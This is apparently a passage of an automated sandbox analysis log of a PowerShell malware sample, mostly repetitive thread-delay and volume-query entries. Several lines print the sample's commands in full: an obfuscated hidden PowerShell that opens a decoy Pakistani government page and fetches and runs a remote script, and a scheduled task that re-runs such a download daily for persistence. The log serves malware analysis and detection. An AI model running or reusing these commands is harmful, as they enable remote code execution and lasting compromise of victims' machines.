                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 7254Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2502Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5857Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1516Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5258Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4447Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5543
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4192
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6596Thread sleep time: -11068046444225724s >= -30000sJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7416Thread sleep time: -922337203685477s >= -30000sJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7416Thread sleep time: -922337203685477s >= -30000sJump to behavior
                Source: C:\Windows\System32\svchost.exe TID: 2684Thread sleep time: -30000s >= -30000sJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7696Thread sleep count: 5857 > 30Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7720Thread sleep count: 1516 > 30Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7756Thread sleep time: -11068046444225724s >= -30000sJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7736Thread sleep time: -2767011611056431s >= -30000sJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8004Thread sleep time: -21213755684765971s >= -30000sJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8076Thread sleep time: -922337203685477s >= -30000sJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7652Thread sleep count: 5543 > 30
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7652Thread sleep count: 4192 > 30
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7820Thread sleep time: -11990383647911201s >= -30000s
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7860Thread sleep time: -1844674407370954s >= -30000s
                Source: C:\Windows\System32\svchost.exeFile opened: PhysicalDrive0Jump to behavior
                Source: C:\Windows\System32\PING.EXELast function: Thread delayed
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                Source: svchost.exe, 00000008.00000002.3810056014.000002384C841000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.3806337233.000002384722B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.3810194081.000002384C85A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                Source: nslookup.exe, 00000004.00000002.1379267470.000001942A779000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllkkA#P
                Source: powershell.exe, 00000000.00000002.3898678743.0000020573660000.00000004.00000020.00020000.00000000.sdmp, nslookup.exe, 00000005.00000002.1380221695.000001AB91C47000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                Source: PING.EXE, 00000003.00000002.1378144853.0000015928279000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll__
                Source: powershell.exe, 0000000F.00000002.1669768304.000001D1C956B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllGGZ
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess queried: DebugPort
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\PING.EXE "C:\Windows\system32\PING.EXE" www.nadra.gov.pkJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\nslookup.exe "C:\Windows\system32\nslookup.exe" www.yahoo.comJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\nslookup.exe "C:\Windows\system32\nslookup.exe" www.protonmail.comJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://pmo.gov.pk/site/404Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /k schtasks /create /sc daily /tn LocalMCleaner /tr "Powershell -WindowStyle Hidden irm http://ofc.mofserviceserver.top/DSCTSC/|Powershell" /st 10:13 /fJump to behavior
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe schtasks /create /sc daily /tn LocalMCleaner /tr "Powershell -WindowStyle Hidden irm http://ofc.mofserviceserver.top/DSCTSC/|Powershell" /st 10:13 /fJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"Jump to behavior
                Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -nolog -windowst hidde -noexi -noprofile -noninterac -comman ping www.nadra.gov.pk; nslookup www.yahoo.com; nslookup www.protonmail.com; start https://pmo.gov.pk/site/404; $id='ftroof.top/'; &('i'+'r'+'m') http://pmofficepakistancloudserver.shi$id/winsysmgr/|powershell
                Source: powershell.exe, 0000000F.00000002.1601062674.000001D1B1786000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Shell_TrayWnd
                Source: powershell.exe, 0000000F.00000002.1601062674.000001D1B1786000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Progman
                Source: powershell.exe, 0000000F.00000002.1601062674.000001D1B1786000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Shell_TrayWnd2
                Source: powershell.exe, 0000000F.00000002.1601062674.000001D1B1786000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Progman2
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformationJump to behavior
                Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
                Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
                Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
                Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
                Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
                Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
                Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
                Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
                Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformationJump to behavior
                Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
                Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
                Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Program Files\WindowsPowerShell\Modules\PSReadline\2.0.0\Microsoft.PowerShell.PSReadline.dll VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
